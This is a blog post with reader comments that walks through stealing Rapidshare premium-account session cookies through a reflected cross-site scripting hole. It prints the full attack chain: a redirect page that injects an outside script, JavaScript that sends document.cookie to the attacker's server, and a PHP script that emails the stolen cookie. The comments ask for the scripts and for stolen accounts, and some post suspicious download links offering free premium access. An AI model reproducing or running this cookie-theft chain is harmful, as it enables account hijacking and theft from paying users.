Hacking in to Rapidshare.
After a long i decided to blog… i regularly download stuff from RS but the bad thing about it is that it allow limited downloading with free account and the evil thing about it is that you cant download concurrently and have to wait for long if you have recently downloaded stuff. i managed to get a RS premium account from one of my friend aka b3ast he’s from PCIA some hacking related team. I logged in as a premium user and it allowed me to download stuff but i got curious to get more RS accounts in the mean while i visited xssed and found there are couple of xss vulnerabilities that exist in Rapid share and they didn’t even bothered to fix them now the next thing to do is to search through what can we do with the xss while i was logged in with the premium account in firefox i did alert(”+document.cookie); guess what it showed me a cookie with my premium credentials.. “cool” for a guy a like me and Very bad for the guy who actually paid for the RS Premium account 
Now what next i have to make that xss to get me some RS premium accounts.
I wrote a java script in an html page that will forward user to rapidshare xss vulnerable page.
<script>
var my_var = "https://ssl.rapidshare.com/cgi-bin/folderadmin.cgi?login=
%22%3E%3Cscript%20src%3D'http://sufism.com.pk/javas.js'%3E%3C/script%3E";
window.location= my_var;
</script>
Next thing was to get javas.js to forward the cookie to my email for that javas.js would look some thing like this.
var my_var = "http://www.sufism.com.pk/rs.php?cook=";
my_var = my_var + document.cookie;
window.location = my_var;
saved it as a javas.js in sufism.com.pk/javas.js
now for the rs.php i wrote a small script in it
<?php
if ( isset($_GET['cook']) )
{
mail('azimyasin[at]gmail[dot]com','Rapidshare Preminum account',$_GET['cook']);
}
header('Location: http://www.rapidshare.com/');
?>
Now if some one visited the html page and if he/she is logged in to his/her rs premium account i will get an email with his/her rs account neat… isnt it 
The demonstration of it is available at http://sufism.com.pk/rapid.html
Regards
Azeem.
great!
Awesome dude .. simply awesome !!! two thumbs up
could you please post those scripts??? so I can do my own site, thanks in advance.
)))) thanks for helping
all the scripts that i haved used are defined above however if you want any help with making it work let me know.
Yes that would be great, please compile those files (html, js, php etc) wich are needed to make that site, after that I can edit it to fit with my needs (I can do that myself) And please upload it in 1 package (rar) with extra instructions if needed (readme) thanks a million bro
SEND ME SCRIPT TO BOJANBELGRADE@GMAIL.COM
THANKSSSSS
[...] Hacking in to Rapidshare. [...]
Hacing into Rapidshare « Yasir’s blog said this on December 13, 2007 at 7:27 am |
I don’t believe it
Need to changes BYYYYYYYYYYYYYYYYYYYYYYY
Fresh rapidshare premium accounts
http://rapidshare.com/files/110311744/fresh_accounts_list.rar
http://rapidshare.com/files/110312190/acc_and_pass.rar
http://rapidshare.com/files/110312538/hot_june_account.rar
http://rapidshare.com/files/110313040/new_account_april_to_july.rar
Could you please send me the script to jacques@webdew.co.za good work I love this board!!
BRO CAN U GIVE Me one acccount pls… in rs
ae4ea_orejas@yahoo.com thnx dude ur such a great hucker im hucker 2 but im using visual basic only like winsock……..thnx dude can u give me one and i dondt chane the pass.
Really cool.
Really cool.
Mein beth ke aik aik part download karti hoon and you have to wait in between too. So really really good. If I could only make some sense out of it
Yeah it’s cool until you know how to use it the basic idea behind it is to find out XSS vulnerability in a website and use it i found xssed the best place to search well known site with XSS Vulerabilities.
HI guys great job , anyone can share some premium accounts ? email : chapyment@yahoo.com Thanks alot
itz not working bro… i tried it.. i need some guidence
i want to ask about “rs.php”, i have been wrote the code but i can’t execute..please help me, i’m newbie, when i execute rs.php from my website i just get the blank page..
i try execute “rs.php” from your website, i get page of rapidshare.com,but from my website i just get the blank page..
thanks 4 your help
Update!!!
Bypass the Low Speed of Free Rapidshare User and GET ALL THE BENEFITS OF PREMIUM RAPIDSHARE USER FOR FREE!
http://rapidshare.com/files/135686811/RAPIDSHARE_HIGH_SPEED_FREE_DOWNLOADER.rar
DOWNLOAD Now FREE With Parallel Streams and HIGH SPEEDS!
Download it now, before it’s removed.
By any chance could i please have a RS Account Plus you a really good hacker btw
Mcsweeney63z@gmail.com
mr azimyasin would you pls contact me at sife@bsdmail.org .
hey azimyasin
i was wondering if you have a spare rapid share account..
can any one give a premium account… mail to arjun.raja321@gmail.com
plz sent a working script to moncy12345@gmail.com
Hi,
this is very useful to us.
Good Luck
Dirnov
please please if u have a rs premium account please mail it to
sridarshan_js@yahoo.co.in